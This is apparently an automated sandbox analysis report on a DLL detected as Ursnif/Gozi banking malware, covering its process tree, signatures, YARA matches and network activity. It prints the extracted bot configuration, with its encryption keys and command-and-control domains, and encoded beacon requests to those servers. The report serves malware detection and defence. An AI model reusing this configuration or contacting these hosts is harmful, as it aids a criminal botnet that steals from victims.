Play interactive tour

Edit tour

Windows Analysis Report 6yDD19jMIu.dll

Overview

General Information

Sample Name:	6yDD19jMIu.dll
Analysis ID:	500309
MD5:	903cf677ba834a968b42bd71e4626a9d
SHA1:	c751f3ab4612917d15967fc1f0591e674c2e56ca
SHA256:	b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
Tags:	BRTdllgeoGoziISFBITAUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for domain / URL

Writes or reads registry keys via WMI

Writes registry values via WMI

Uses 32bit PE files

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3708 cmdline: loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6044 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5172 cmdline: rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6048 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 476 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 4680 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 984 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 3056 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 2100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 3708	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 5172	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.6ece0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.342a31a.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.loaddll32.exe.71a31a.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.750000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.12b0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.12fa31a.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.25c94a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.c5a31a.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
6.3.rundll32.exe.b0a31a.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.4d094a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
6.3.rundll32.exe.b0a31a.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.loaddll32.exe.71a31a.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.c5a31a.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.12fa31a.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.25c94a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.342a31a.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.4d094a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.6ece0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: 6yDD19jMIu.dll

Virustotal: Detection: 9%

Perma Link

Multi AV Scanner detection for domain / URL

Show sources

Source: areuranel.website	Virustotal: Detection: 6%			Perma Link
Source: breuranel.website	Virustotal: Detection: 6%			Perma Link

Source: 6yDD19jMIu.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown	HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.98.152.242:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.97.137.242:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.5:49790 version: TLS 1.2

Source: 6yDD19jMIu.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.482429181.0000000004AE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.500262352.0000000004CE3000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbQ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbE source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdbI source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.482428909.00000000036AE000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdbC source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.645023107.000000006ED5B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645833298.000000006ED5B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbw source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb_ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.501149079.0000000000D02000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 52.98.208.66 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 40.97.161.50 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 40.101.9.178 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 13.82.28.61 187	Jump to behavior

Source: Joe Sandbox View

ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: Joe Sandbox View

IP Address: 40.97.161.50 40.97.161.50

Source: global traffic	HTTP traffic detected: GET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
Source: global traffic	HTTP traffic detected: GET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
